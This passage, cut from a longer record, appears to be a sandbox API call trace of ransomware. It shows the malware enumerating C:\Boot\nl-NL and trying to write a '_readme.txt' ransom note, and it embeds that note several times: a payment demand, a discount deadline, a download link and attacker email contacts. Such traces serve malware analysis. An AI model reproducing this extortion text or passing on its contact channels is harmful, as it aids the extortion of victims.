returned 0x2ad7e78 [0184.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.045] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0184.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.046] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0184.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.046] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.046] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.046] PathFindFileNameW (pszPath="") returned="" [0184.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0184.046] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.047] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0184.047] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0184.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.047] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.047] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0184.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.048] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0184.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.048] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.048] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac5768 [0184.048] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac5768 | out: hHeap=0x2c0000) returned 1 [0184.049] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0184.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.050] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*" (normalized: "c:\\boot\\nl-nl\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.050] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.050] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.051] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.051] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.051] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.051] PathFindExtensionW (pszPath="C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned=".mui" [0184.051] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.052] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.052] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0184.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.052] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0184.053] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0184.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.053] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0184.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.054] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.054] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.055] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.056] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.057] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.058] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.059] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.059] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.062] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0184.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.064] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0184.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.071] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.072] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0184.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0184.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 